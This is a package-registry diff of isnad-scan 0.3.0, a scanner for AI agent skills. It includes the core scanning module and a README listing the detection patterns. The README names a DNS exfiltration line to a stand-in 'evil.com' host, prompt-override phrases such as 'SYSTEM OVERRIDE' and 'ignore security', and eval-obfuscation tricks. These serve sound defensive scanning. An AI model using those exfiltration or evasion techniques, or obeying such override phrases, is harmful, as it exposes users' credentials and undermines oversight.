isnad-scan 0.3.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
isnad_scan/scanner.py ADDED
@@ -0,0 +1,342 @@
1
+ """Core scanning logic."""
2
+ import hashlib
3
+ import json
4
+ import os
5
+ from dataclasses import dataclass, field
6
+ from pathlib import Path
7
+ from typing import Dict, List, Optional, Set
8
+ from urllib.parse import urlparse
9
+
10
+ from .patterns import Finding, Severity, scan_content, scan_dependencies
11
+ from .ast_analyzer import analyze_python_ast, is_python_file
12
+ from .cve_checker import check_dependencies_for_cves
13
+ from .js_analyzer import analyze_javascript, is_javascript_file
14
+ from .binary_scanner import scan_binary_file, is_binary_file, is_image_file, BINARY_EXTENSIONS, IMAGE_EXTENSIONS
15
+
16
+
17
# Suffixes of text files whose content is scanned.
SCANNABLE_EXTENSIONS = {
    # Source code
    '.py', '.js', '.ts', '.jsx', '.tsx', '.mjs', '.cjs',
    # Shell scripts
    '.sh', '.bash', '.zsh', '.fish',
    # Documentation
    '.md', '.markdown', '.txt', '.rst',
    # Markup
    '.html', '.htm', '.xml',
    # Configuration
    '.yaml', '.yml', '.json', '.toml', '.ini', '.cfg',
    # Environment files
    '.env', '.env.example', '.env.local',
}

# Suffixes routed to the binary scanner instead of the text scanner.
BINARY_SCAN_EXTENSIONS = BINARY_EXTENSIONS | IMAGE_EXTENSIONS

# Dependency manifests / lockfiles; these get an extra dependency scan.
DEPENDENCY_FILES = {
    # Python
    'requirements.txt', 'requirements-dev.txt', 'requirements-test.txt',
    'Pipfile', 'pyproject.toml', 'setup.py', 'setup.cfg',
    # JavaScript
    'package.json', 'package-lock.json', 'yarn.lock',
    # Ruby
    'Gemfile', 'Gemfile.lock',
    # Go
    'go.mod', 'go.sum',
    # Rust
    'Cargo.toml', 'Cargo.lock',
}

# File names that are scanned no matter what their suffix is.
ALWAYS_SCAN = {'SKILL.md', 'README.md', 'AGENTS.md', 'Dockerfile', 'Makefile'}

# Directory names that the directory walk never descends into.
SKIP_DIRS = {
    'node_modules', '__pycache__', '.git', 'venv', '.venv',
    'dist', 'build', '.tox', '.pytest_cache', '.mypy_cache',
    'egg-info', '.eggs', 'htmlcov', '.coverage',
}

# Upper bound on the size of a text file that will be scanned: 1 MiB.
MAX_FILE_SIZE = 1 << 20
52
+
53
+
54
@dataclass
class ScanResult:
    """Accumulated outcome of scanning one skill path.

    Holds the findings, file counters, error/warning messages, per-file
    content hashes and the unsafe symlinks recorded during a scan, and
    derives the overall trust level and CLI exit code from them.
    """
    path: str
    findings: List[Finding] = field(default_factory=list)
    files_scanned: int = 0
    files_skipped: int = 0
    errors: List[str] = field(default_factory=list)
    warnings: List[str] = field(default_factory=list)
    file_hashes: Dict[str, str] = field(default_factory=dict)
    symlinks_found: List[str] = field(default_factory=list)

    def _count(self, severity) -> int:
        """Return how many findings carry exactly the given severity."""
        return len([item for item in self.findings if item.severity == severity])

    @property
    def trust_level(self) -> str:
        """Overall verdict: "DANGER", "WARN", "CAUTION" or "SAFE".

        Any DANGER finding yields "DANGER"; more than three WARN findings
        yield "WARN"; one to three WARN findings, or any recorded symlink,
        yield "CAUTION"; otherwise the result is "SAFE".
        """
        if self._count(Severity.DANGER) > 0:
            return "DANGER"

        warn_total = self._count(Severity.WARN)
        if warn_total > 3:
            return "WARN"
        if warn_total > 0 or self.symlinks_found:
            # A recorded symlink alone is treated as suspicious.
            return "CAUTION"
        return "SAFE"

    @property
    def exit_code(self) -> int:
        """Process exit code: 2 for DANGER, 1 for WARN/CAUTION, 0 otherwise."""
        codes = {"DANGER": 2, "WARN": 1, "CAUTION": 1}
        return codes.get(self.trust_level, 0)

    def summary(self) -> dict:
        """Return the trust level plus counters as a plain dictionary."""
        per_severity = {
            "danger": self._count(Severity.DANGER),
            "warn": self._count(Severity.WARN),
            "info": self._count(Severity.INFO),
        }
        return {
            "trust_level": self.trust_level,
            "files_scanned": self.files_scanned,
            "files_skipped": self.files_skipped,
            "findings": per_severity,
            "errors": len(self.errors),
            "warnings": len(self.warnings),
            "symlinks": len(self.symlinks_found),
        }

    @property
    def content_hash(self) -> str:
        """Combined 16-hex-character digest of all per-file hashes.

        Returns an empty string when no file hashes were recorded. Entries
        are sorted first so the digest does not depend on scan order.
        """
        if not self.file_hashes:
            return ""
        entries = [
            f"{name}:{digest}"
            for name, digest in sorted(self.file_hashes.items())
        ]
        joined = "|".join(entries)
        return hashlib.sha256(joined.encode()).hexdigest()[:16]
117
+
118
+
119
def should_scan_file(path: Path) -> bool:
    """Decide whether a file should go through the text scanner.

    A file qualifies when its name is in ALWAYS_SCAN or DEPENDENCY_FILES,
    when its (lower-cased) suffix is in SCANNABLE_EXTENSIONS, or when its
    whole (lower-cased) name is in SCANNABLE_EXTENSIONS.

    Args:
        path: File path to classify; only its name and suffix are inspected.

    Returns:
        True if the file should be scanned as text, False otherwise.
    """
    name = path.name
    if name in ALWAYS_SCAN or name in DEPENDENCY_FILES:
        return True
    if path.suffix.lower() in SCANNABLE_EXTENSIONS:
        return True
    # Dotfiles such as ".env" have an empty suffix and ".env.local" has the
    # suffix ".local", so the suffix test above can never select them even
    # though they are listed in SCANNABLE_EXTENSIONS. Match the full name too.
    return name.lower() in SCANNABLE_EXTENSIONS
128
+
129
+
130
def should_scan_binary(path: Path) -> bool:
    """Return True when the file's suffix marks it for the binary scanner."""
    suffix = path.suffix.lower()
    return suffix in BINARY_SCAN_EXTENSIONS
133
+
134
+
135
def is_dependency_file(path: Path) -> bool:
    """Return True when the file name is a known dependency manifest."""
    filename = path.name
    return filename in DEPENDENCY_FILES
138
+
139
+
140
def check_symlink_safety(path: Path, base_dir: Path) -> tuple[bool, Optional[str]]:
    """Report whether *path* is safe with respect to symlink escapes.

    A path that is not a symlink is always safe. A symlink is safe only
    when its resolved target lies inside the resolved *base_dir*.

    Returns:
        (True, None) when safe, otherwise (False, message) where the
        message explains either the escape or the resolution failure.
    """
    if not path.is_symlink():
        return True, None

    try:
        target = path.resolve()
        root = base_dir.resolve()
    except Exception as exc:
        # Anything that prevents resolution is treated as unsafe.
        return False, f"Could not resolve symlink {path}: {exc}"

    if target.is_relative_to(root):
        return True, None
    return False, f"Symlink escapes skill directory: {path} -> {target}"
160
+
161
+
162
def hash_content(content: str) -> str:
    """Return the first 16 hex characters of the SHA-256 of *content*."""
    hasher = hashlib.sha256()
    hasher.update(content.encode())
    full_digest = hasher.hexdigest()
    return full_digest[:16]
165
+
166
+
167
def scan_file(path: Path, base_dir: Path, check_cves: bool = False) -> tuple[List[Finding], Optional[str], Optional[str]]:
    """Run every applicable text analysis on one file.

    Args:
        path: File to scan.
        base_dir: Accepted for interface compatibility; not used here.
        check_cves: When true, dependency manifests are additionally
            checked for CVEs (the original comment notes this needs network).

    Returns:
        A (findings, error, content_hash) triple. On any failure the
        findings list is empty, the hash is None and error describes why.
    """
    try:
        # Oversized files are refused outright rather than partially scanned.
        if path.stat().st_size > MAX_FILE_SIZE:
            return [], f"File too large: {path}", None

        # Prefer UTF-8; fall back to latin-1 only on a decode failure.
        try:
            text = path.read_text(encoding='utf-8')
        except UnicodeDecodeError:
            try:
                text = path.read_text(encoding='latin-1')
            except Exception:
                return [], f"Could not decode: {path}", None

        label = str(path)
        digest = hash_content(text)

        # Regex pattern scan comes first; the other analyses append to it.
        collected = scan_content(text, label)

        # AST analysis for Python files (catches evasion that regex misses)
        if is_python_file(label):
            collected.extend(analyze_python_ast(text, label))

        # JavaScript analysis (including minified code handling)
        if is_javascript_file(label):
            collected.extend(analyze_javascript(text, label))

        # Dependency manifests get a dedicated scan, plus optional CVE lookup.
        if is_dependency_file(path):
            collected.extend(scan_dependencies(text, label))
            if check_cves:
                collected.extend(check_dependencies_for_cves(text, label))

        return collected, None, digest

    except Exception as exc:
        return [], f"Error scanning {path}: {exc}", None
216
+
217
+
218
def _flag_unsafe_symlink(result, link, pattern_id, message, fallback):
    """Record an unsafe symlink on *result* as a DANGER finding."""
    link_str = str(link)
    result.symlinks_found.append(link_str)
    result.findings.append(Finding(
        severity=Severity.DANGER,
        pattern_id=pattern_id,
        description=message or fallback,
        file=link_str,
        line=0,
        match=link_str,
    ))


def _scan_entry(result, filepath, base_dir, check_cves):
    """Scan one file as text or binary, or count it as skipped, updating *result*."""
    if should_scan_file(filepath):
        findings, error, content_hash = scan_file(filepath, base_dir, check_cves=check_cves)
        result.findings.extend(findings)
        result.files_scanned += 1
        if content_hash:
            result.file_hashes[str(filepath)] = content_hash
        if error:
            result.errors.append(error)
    elif should_scan_binary(filepath):
        # Scan binary files (pyc, images, etc.)
        bin_findings, bin_error = scan_binary_file(filepath)
        result.findings.extend(bin_findings)
        result.files_scanned += 1
        if bin_error:
            result.errors.append(bin_error)
    else:
        result.files_skipped += 1


def scan_directory(path: Path, check_cves: bool = False) -> ScanResult:
    """Scan a skill directory (or a single file) for security issues.

    Args:
        path: Directory to walk, or a single file to scan.
        check_cves: Forwarded to scan_file for dependency manifests.

    Returns:
        A ScanResult holding findings, counters, errors and warnings. A
        missing path yields a result with a single error and no findings.
    """
    result = ScanResult(path=str(path))
    base_dir = path.resolve()

    if not path.exists():
        result.errors.append(f"Path does not exist: {path}")
        return result

    if not path.is_dir():
        # Single file scan. The symlink check applies to text-scannable
        # files only, as before; binaries now go through the same dispatch
        # as in directory mode instead of being counted as skipped.
        if should_scan_file(path):
            is_safe, symlink_error = check_symlink_safety(path, path.parent)
            if not is_safe:
                _flag_unsafe_symlink(
                    result, path, 'unsafe_symlink',
                    symlink_error, 'Symlink to external location',
                )
        _scan_entry(result, path, path.parent, check_cves)
        return result

    # Files already visited, keyed by (device, inode). An inode number is
    # only unique per device, so keying on st_ino alone would wrongly skip
    # distinct files that live on different filesystems.
    seen_files: Set[tuple] = set()

    for root, dirs, files in os.walk(path, followlinks=False):
        root_path = Path(root)

        # Skip hidden directories and common non-code dirs
        dirs[:] = [d for d in dirs if not d.startswith('.') and d not in SKIP_DIRS]

        # Flag directory symlinks that resolve outside the skill directory.
        for d in list(dirs):
            dir_path = root_path / d
            if not dir_path.is_symlink():
                continue
            is_safe, symlink_error = check_symlink_safety(dir_path, base_dir)
            if not is_safe:
                _flag_unsafe_symlink(
                    result, dir_path, 'unsafe_symlink_dir',
                    symlink_error, 'Directory symlink to external location',
                )
                dirs.remove(d)  # Don't traverse unsafe symlinks

        for filename in files:
            filepath = root_path / filename

            # Unsafe file symlinks are reported and never read.
            if filepath.is_symlink():
                is_safe, symlink_error = check_symlink_safety(filepath, base_dir)
                if not is_safe:
                    _flag_unsafe_symlink(
                        result, filepath, 'unsafe_symlink',
                        symlink_error, 'Symlink to external location',
                    )
                    continue

            # Skip content that was already visited through another name.
            try:
                info = filepath.stat()
            except OSError:
                # Best effort only: an unreadable entry is still handed to
                # the scanner below, which reports the failure itself.
                info = None
            # st_ino == 0 carries no identity, so it is never deduplicated.
            if info is not None and info.st_ino:
                file_key = (info.st_dev, info.st_ino)
                if file_key in seen_files:
                    result.warnings.append(f"Duplicate inode (possible hard link): {filepath}")
                    continue
                seen_files.add(file_key)

            _scan_entry(result, filepath, base_dir, check_cves)

    return result
328
+
329
+
330
def scan_skill(path_or_url: str, check_cves: bool = False) -> ScanResult:
    """Main entry point: scan a skill given as a local path or a URL.

    http/https URLs are not supported yet and produce a result carrying
    only an error message. Anything else is treated as a local path,
    resolved, and handed to scan_directory.
    """
    scheme = urlparse(path_or_url).scheme
    if scheme not in ('http', 'https'):
        # Local path
        local_path = Path(path_or_url).resolve()
        return scan_directory(local_path, check_cves=check_cves)

    # TODO: Download and scan
    unsupported = ScanResult(path=path_or_url)
    unsupported.errors.append("URL scanning not yet implemented - download the skill first")
    return unsupported
@@ -0,0 +1,186 @@
1
+ Metadata-Version: 2.4
2
+ Name: isnad-scan
3
+ Version: 0.3.0
4
+ Summary: Security scanner for AI agent skills - detects code injection, prompt injection, credential exfiltration, and supply chain attacks
5
+ Project-URL: Homepage, https://isnad.md
6
+ Project-URL: Documentation, https://isnad.md/docs
7
+ Project-URL: Repository, https://github.com/counterspec/isnad
8
+ Project-URL: Issues, https://github.com/counterspec/isnad/issues
9
+ Author-email: ISNAD Protocol <rapi@base64.amsterdam>
10
+ License: MIT
11
+ Keywords: agents,ai,cve,scanner,security,skills,vulnerability
12
+ Classifier: Development Status :: 4 - Beta
13
+ Classifier: Environment :: Console
14
+ Classifier: Intended Audience :: Developers
15
+ Classifier: License :: OSI Approved :: MIT License
16
+ Classifier: Operating System :: OS Independent
17
+ Classifier: Programming Language :: Python :: 3
18
+ Classifier: Programming Language :: Python :: 3.11
19
+ Classifier: Programming Language :: Python :: 3.12
20
+ Classifier: Topic :: Security
21
+ Classifier: Topic :: Software Development :: Quality Assurance
22
+ Requires-Python: >=3.11
23
+ Requires-Dist: click>=8.0
24
+ Requires-Dist: pyyaml>=6.0
25
+ Requires-Dist: rich>=13.0
26
+ Description-Content-Type: text/markdown
27
+
28
+ # ISNAD Skill Scanner
29
+
30
+ Security scanner for AI agent skills. Detects code injection, prompt injection, credential exfiltration, evasion techniques, and malicious dependencies.
31
+
32
+ **Version:** 0.3.0
33
+ **Patterns:** 69 (45 DANGER, 20 WARN, 4 INFO)
34
+
35
+ ## Installation
36
+
37
+ ```bash
38
+ cd isnad/scanner
39
+ uv pip install -e .
40
+ ```
41
+
42
+ Or run directly:
43
+
44
+ ```bash
45
+ uv run python -m isnad_scan.cli <path>
46
+ ```
47
+
48
+ ## Usage
49
+
50
+ ```bash
51
+ # Scan a skill directory
52
+ isnad-scan ./skills/some-skill/
53
+
54
+ # JSON output (for CI/programmatic use)
55
+ isnad-scan ./skill --json
56
+
57
+ # Verbose (include INFO-level findings)
58
+ isnad-scan ./skill --verbose
59
+
60
+ # Show content hash (for caching/comparison)
61
+ isnad-scan ./skill --hash
62
+
63
+ # Quiet mode (just trust level)
64
+ isnad-scan ./skill --quiet
65
+ ```
66
+
67
+ ## Exit Codes
68
+
69
+ | Code | Meaning |
70
+ |------|---------|
71
+ | 0 | SAFE - no issues found |
72
+ | 1 | CAUTION/WARN - review recommended |
73
+ | 2 | DANGER - security issues detected |
74
+ | 3 | ERROR - scanner error |
75
+
76
+ ## What It Detects
77
+
78
+ ### DANGER (45 patterns)
79
+
80
+ **Code Execution:**
81
+ - `eval()`, `exec()`, `compile()` usage
82
+ - `getattr(__builtins__, 'eval')` evasion
83
+ - String concatenation building dangerous calls (`"ev"+"al"`)
84
+ - `chr()` concatenation obfuscation
85
+ - `new Function()` in JavaScript
86
+ - Lambda with dangerous functions
87
+
88
+ **Shell Injection:**
89
+ - `subprocess` with `shell=True`
90
+ - `os.system()`, `os.popen()`
91
+ - `child_process.exec()` in Node.js
92
+ - Backtick command substitution
93
+
94
+ **Prompt Injection:**
95
+ - Hidden instructions in HTML comments
96
+ - "SYSTEM OVERRIDE" / "ignore security" patterns
97
+ - Instructions to suppress reporting
98
+
99
+ **Data Exfiltration:**
100
+ - Credential variables sent to network
101
+ - DNS exfiltration (`socket.gethostbyname(secret + ".evil.com")`)
102
+ - Tor hidden service URLs
103
+
104
+ **Obfuscation:**
105
+ - Base64 decoding, ROT13, hex strings
106
+ - `bytes.fromhex()`, Unicode escapes
107
+ - Unicode homoglyph evasion (ℯval vs eval)
108
+
109
+ **Path Traversal & Symlinks:**
110
+ - `../../` patterns in code
111
+ - Symlinks escaping skill directory
112
+
113
+ **Dangerous Deserialization:**
114
+ - `pickle.load()`, `marshal.load()`
115
+ - Unsafe YAML loading
116
+
117
+ **Dependency Attacks:**
118
+ - Typosquatted packages (reqeusts, crytpography, etc.)
119
+ - Suspicious git dependencies
120
+ - Known malicious package names
121
+
122
+ ### WARN (20 patterns)
123
+ - Network requests (verify destinations)
124
+ - File write/delete operations
125
+ - Environment variable access
126
+ - Dynamic imports
127
+ - Crypto library usage
128
+
129
+ ### INFO (4 patterns)
130
+ - Subprocess with list args
131
+ - File reads
132
+ - Logging statements
133
+
134
+ ## Context Awareness
135
+
136
+ The scanner is context-aware:
137
+ - Patterns in **documentation** (markdown, comments explaining attacks) are downgraded to INFO
138
+ - Patterns in **code blocks** within markdown are handled appropriately
139
+ - **String literals** containing pattern names (e.g., dict keys) don't trigger false positives
140
+
141
+ ## Example
142
+
143
+ ```
144
+ $ isnad-scan ./evasion-skill/
145
+
146
+ ╭─── ISNAD Scan: ./evasion-skill ───╮
147
+ │ Trust Level: 🚨 DANGER │
148
+ ╰───────────────────────────────────╯
149
+
150
+ 📁 Files scanned: 3
151
+ 🚨 DANGER findings: 18
152
+
153
+ [DANGER] evasion.py:10 — getattr_dangerous
154
+ Dynamic access to dangerous function via getattr
155
+
156
+ [DANGER] evasion.py:5 — string_concat_evasion
157
+ String concatenation building eval/exec - evasion attempt
158
+
159
+ [DANGER] SKILL.md:5 — prompt_injection_html
160
+ Potential prompt injection - attempts to override security
161
+
162
+ [DANGER] requirements.txt:6 — dangerous_package
163
+ Potentially dangerous or typosquatted package: reqeusts
164
+ ```
165
+
166
+ ## Limitations
167
+
168
+ What the scanner **cannot** catch (yet):
169
+ - AST-level evasion (import aliasing, nested dynamic calls)
170
+ - Minified/bundled JavaScript
171
+ - Binary files with embedded scripts
172
+ - Packages with known CVEs (needs OSV integration)
173
+ - Actual malicious intent vs. legitimate security tools
174
+
175
+ ## Roadmap
176
+
177
+ - [x] Pattern-based scanning (69 patterns)
178
+ - [x] Dependency scanning (typosquats, suspicious sources)
179
+ - [x] Symlink safety checks
180
+ - [x] Context awareness (docs vs code)
181
+ - [x] Prompt injection detection
182
+ - [ ] AST parsing for Python/JS
183
+ - [ ] CVE database integration (OSV/Snyk)
184
+ - [ ] URL scanning (download remote skills)
185
+ - [ ] ISNAD Registry integration (inscribe attestations)
186
+ - [ ] ClawHub pre-install hook
@@ -0,0 +1,12 @@
1
+ isnad_scan/__init__.py,sha256=cVH3AVOQHwKu6_4AqNPbwLLcOS8JaPoKFFICmmzG9iA,88
2
+ isnad_scan/ast_analyzer.py,sha256=nE49V8UKcDtL0qYj-36dz3PAoH8UQ2RVGD9mzNT4hjw,15446
3
+ isnad_scan/binary_scanner.py,sha256=zb8X7pfAej54uxq8K_xYvGew6ENJjcB40TOWlVb92r0,8276
4
+ isnad_scan/cli.py,sha256=RfgKnP2tpF_ud8XrY9cH3tKY6G-gh49s7lVNljXQWbE,7475
5
+ isnad_scan/cve_checker.py,sha256=SLElHRrQV7Q9-d9-RgDdGcUSrD8KLojFVOb5ZRkRnWU,8333
6
+ isnad_scan/js_analyzer.py,sha256=9_z9l30AMPGm9KQKjwXNv0Ic8g4Y3zS3AtY1R0VhH2A,6967
7
+ isnad_scan/patterns.py,sha256=E_tJzPBVb1R0hKeNzjqvqkILdH_G02md8iK0hxU-IXM,21090
8
+ isnad_scan/scanner.py,sha256=eELhXdDgsWuJqTfwVMbUrnplKCAdj-jenDRPsx0b5bQ,12563
9
+ isnad_scan-0.3.0.dist-info/METADATA,sha256=IlN-51e5Kcyfy4UTTI3c0IH-5Z0FITI2ec7XeVIZmqw,5332
10
+ isnad_scan-0.3.0.dist-info/WHEEL,sha256=WLgqFyCfm_KASv4WHyYy0P3pM_m7J5L9k2skdKLirC8,87
11
+ isnad_scan-0.3.0.dist-info/entry_points.txt,sha256=XzQEtAu7l_PAGfpehU4ZFiqybOfrKrFqkWzCNvC6_SY,51
12
+ isnad_scan-0.3.0.dist-info/RECORD,,
@@ -0,0 +1,4 @@
1
+ Wheel-Version: 1.0
2
+ Generator: hatchling 1.28.0
3
+ Root-Is-Purelib: true
4
+ Tag: py3-none-any
@@ -0,0 +1,2 @@
1
+ [console_scripts]
2
+ isnad-scan = isnad_scan.cli:main